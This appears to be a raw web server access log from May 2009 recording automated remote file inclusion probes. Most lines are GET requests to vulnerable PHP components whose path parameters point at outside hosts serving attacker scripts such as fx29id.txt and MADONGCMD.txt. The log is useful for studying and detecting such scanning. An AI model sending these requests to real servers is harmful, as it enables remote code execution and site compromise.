222.122.26.5 - - [19/May/2009:03:40:04 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
222.122.26.5 - - [19/May/2009:03:40:04 -0400] "GET /logs/access_log.Q108090200/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.122.26.5 - - [19/May/2009:03:40:04 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.122.26.5 - - [19/May/2009:03:40:04 -0400] "GET /logs/access_log.Q108110900/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:40:16 -0400] "GET /logs/access_log.Q108091400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.115.89.68 - - [19/May/2009:03:41:02 -0400] "GET /logs/access_log.Q109051100%20%20//index.php?_shop_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:41:11 -0400] "GET /errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:41:11 -0400] "GET /logs/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:41:11 -0400] "GET /logs/access_log.Q108121400/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:41:11 -0400] "GET /logs/access_log.Q108072400/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:41:11 -0400] "GET /errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:41:11 -0400] "GET /logs/access_log.Q108121400/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:41:11 -0400] "GET /logs/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:41:11 -0400] "GET /logs/access_log.Q108072400/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:41:59 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:41:59 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:41:59 -0400] "GET /logs/access_log.Q108090100//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:03:42:04 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:03:42:04 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:03:42:05 -0400] "GET /logs/error_log.Q108033000%20%20//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:42:13 -0400] "GET /logs/access_log.Q108091400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:03:42:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.98.59.178 - - [19/May/2009:03:42:24 -0400] "GET /logs/error_log.Q108032900%20%20//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
118.45.190.166 - - [19/May/2009:03:43:37 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
222.122.26.5 - - [19/May/2009:03:43:39 -0400] "GET /logs/access_log.Q108090200%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:43:45 -0400] "GET /logs/access_log.Q108121400%20%20/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:43:45 -0400] "GET /logs/access_log.Q108072400%20%20/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:43:54 -0400] "GET /logs/access_log.Q108121400%20%20/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:43:54 -0400] "GET /logs/access_log.Q108072400%20%20/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.26.5 - - [19/May/2009:03:43:58 -0400] "GET /logs/access_log.Q108110900%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
213.198.53.173 - - [19/May/2009:03:44:17 -0400] "GET /logs/access_log.Q108110300//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
213.198.53.173 - - [19/May/2009:03:44:17 -0400] "GET /logs/access_log.Q108082200//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
213.198.53.173 - - [19/May/2009:03:44:17 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
213.198.53.173 - - [19/May/2009:03:44:17 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:03:45:09 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:03:45:09 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:03:45:09 -0400] "GET /logs/access_log.Q108091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:03:45:15 -0400] "GET /logs/access_log.Q108061500//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/lisna212/sayangku.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.811"
65.98.59.178 - - [19/May/2009:03:45:15 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/lisna212/sayangku.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
65.98.59.178 - - [19/May/2009:03:45:15 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/lisna212/sayangku.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.811"
65.98.59.178 - - [19/May/2009:03:45:15 -0400] "GET /logs/access_log.Q108120600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/lisna212/sayangku.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.811"
65.98.59.178 - - [19/May/2009:03:45:29 -0400] "GET /logs/error_log.Q108033000%20%20//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:03:45:29 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:03:45:29 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:03:45:37 -0400] "GET /logs/error_log.Q108032900%20%20//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:03:46:17 -0400] "GET /logs/error_log.Q109050400//tools/send_reminders.php?noSet=0&includedir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:03:46:21 -0400] "GET /logs/access_log.Q108090900//tools/send_reminders.php?noSet=0&includedir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:03:46:39 -0400] "GET /logs/access_log.Q108082900//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:03:47:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [19/May/2009:03:47:47 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:47:50 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:47:50 -0400] "GET /logs/access_log.Q108062800//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:47:56 -0400] "GET /logs/access_log.Q108060200//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.119.103.12 - - [19/May/2009:03:48:15 -0400] "GET /logs/access_log.Q108052400///squirrelcart/cart_content.php?cart_isp_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
216.119.103.12 - - [19/May/2009:03:48:15 -0400] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
216.119.103.12 - - [19/May/2009:03:48:16 -0400] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
217.147.29.190 - - [19/May/2009:03:48:16 -0400] "GET /logs/access_log.Q108062800%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:48:19 -0400] "GET /logs/access_log.Q108060200%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:03:48:32 -0400] "GET /logs/access_log.Q108091400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:03:48:33 -0400] "GET /logs/access_log.Q108061500//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/yuni212/andri.txt??%0D? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
200.93.147.154 - - [19/May/2009:03:48:33 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/yuni212/andri.txt??%0D? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
200.93.147.154 - - [19/May/2009:03:48:33 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/yuni212/andri.txt??%0D? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
200.93.147.154 - - [19/May/2009:03:48:33 -0400] "GET /logs/access_log.Q108120600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/yuni212/andri.txt??%0D? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
200.93.147.154 - - [19/May/2009:03:48:49 -0400] "GET /logs/access_log.Q108061500//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/yuni212/cinta.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
200.93.147.154 - - [19/May/2009:03:48:49 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/yuni212/cinta.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
200.93.147.154 - - [19/May/2009:03:48:49 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/yuni212/cinta.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
200.93.147.154 - - [19/May/2009:03:48:50 -0400] "GET /logs/access_log.Q108120600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/yuni212/cinta.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
110.45.144.106 - - [19/May/2009:03:48:51 -0400] "GET /logs/access_log.Q108082900%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:49:06 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:49:06 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:49:09 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:49:09 -0400] "GET /logs/access_log.Q108060200//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:49:11 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:49:12 -0400] "GET /logs/access_log.Q108062800//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:49:13 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:49:13 -0400] "GET /logs/access_log.Q108062800%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:49:13 -0400] "GET /logs/access_log.Q108060200%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:49:16 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:49:16 -0400] "GET /logs/access_log.Q108062800%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:49:20 -0400] "GET /logs/access_log.Q108060200%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
221.157.225.65 - - [19/May/2009:03:50:40 -0400] "GET //?_zb_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
221.157.225.65 - - [19/May/2009:03:50:40 -0400] "GET /logs/access_log.Q109032900//?_zb_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
221.157.225.65 - - [19/May/2009:03:50:40 -0400] "GET /logs//?_zb_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 200 1959 "-" "Mozilla/5.0"
222.231.24.38 - - [19/May/2009:03:51:35 -0400] "GET /logs/error_log.Q108051600///vwar/backup/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
201.40.77.100 - - [19/May/2009:03:51:43 -0400] "GET /logs/access_log.Q108061500//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kojo.com.tw/kojo//cache/lang/pw.txt???? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
201.40.77.100 - - [19/May/2009:03:51:43 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kojo.com.tw/kojo//cache/lang/pw.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
201.40.77.100 - - [19/May/2009:03:51:44 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kojo.com.tw/kojo//cache/lang/pw.txt???? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
201.40.77.100 - - [19/May/2009:03:51:44 -0400] "GET /logs/access_log.Q108120600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kojo.com.tw/kojo//cache/lang/pw.txt???? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
217.147.29.190 - - [19/May/2009:03:52:12 -0400] "GET /logs/access_log.Q108062800%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:52:12 -0400] "GET /logs/access_log.Q108060200%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:03:52:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.104.104 - - [19/May/2009:03:52:36 -0400] "GET /logs/access_log.Q108102400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
221.139.104.104 - - [19/May/2009:03:52:36 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
221.139.104.104 - - [19/May/2009:03:52:36 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.231.24.38 - - [19/May/2009:03:52:47 -0400] "GET /logs/error_log.Q108051600///vwar/backup/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
221.139.104.104 - - [19/May/2009:03:52:51 -0400] "GET /logs/access_log.Q108111500//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
122.153.212.195 - - [19/May/2009:03:52:53 -0400] "GET //modules/errors.php?error=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
122.153.212.195 - - [19/May/2009:03:52:53 -0400] "GET /logs//modules/errors.php?error=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
122.153.212.195 - - [19/May/2009:03:52:53 -0400] "GET /logs/access_log.Q109030500%20%20//modules/errors.php?error=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.231.24.38 - - [19/May/2009:03:52:55 -0400] "GET /logs/error_log.Q108051600///vwar/backup/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
217.147.29.190 - - [19/May/2009:03:53:59 -0400] "GET /logs/access_log.Q108062800//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:53:59 -0400] "GET /logs/access_log.Q108060200//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.106.135.14 - - [19/May/2009:03:54:02 -0400] "GET /logs/access_log.Q108052400///squirrelcart/cart_content.php?cart_isp_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
87.106.135.14 - - [19/May/2009:03:54:02 -0400] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
87.106.135.14 - - [19/May/2009:03:54:03 -0400] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
213.206.91.16 - - [19/May/2009:03:54:06 -0400] "GET /logs/access_log.Q109051100//index.php?_shop_path=http://www.kojo.com.tw/kojo//cache/lang/safe2.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
213.206.91.16 - - [19/May/2009:03:54:06 -0400] "GET //index.php?_shop_path=http://www.kojo.com.tw/kojo//cache/lang/safe2.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
211.110.19.178 - - [19/May/2009:03:55:04 -0400] "GET /logs/access_log.Q109051100//?_zb_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.110.19.178 - - [19/May/2009:03:55:04 -0400] "GET /logs//?_zb_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 200 1959 "-" "Mozilla/5.0"
211.110.19.178 - - [19/May/2009:03:55:04 -0400] "GET //?_zb_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
216.119.103.12 - - [19/May/2009:03:55:22 -0400] "GET /logs/access_log.Q108100900//?_zb_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
216.119.103.12 - - [19/May/2009:03:55:22 -0400] "GET //?_zb_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
216.119.103.12 - - [19/May/2009:03:55:22 -0400] "GET /logs//?_zb_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 1959 "-" "libwww-perl/5.805"
211.110.19.178 - - [19/May/2009:03:55:31 -0400] "GET /logs/access_log.Q108111500//?_zb_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:03:56:05 -0400] "GET /logs/access_log.Q108061400//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:03:56:08 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:03:56:08 -0400] "GET /logs/access_log.Q108090900%20%20//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:03:56:08 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:03:56:36 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:03:56:36 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:03:56:36 -0400] "GET /logs/error_log.Q108033000%20%20//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:03:56:43 -0400] "GET /logs/error_log.Q108032900%20%20//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:03:57:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [19/May/2009:03:57:32 -0400] "GET /phphtml.php?htmlclass_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
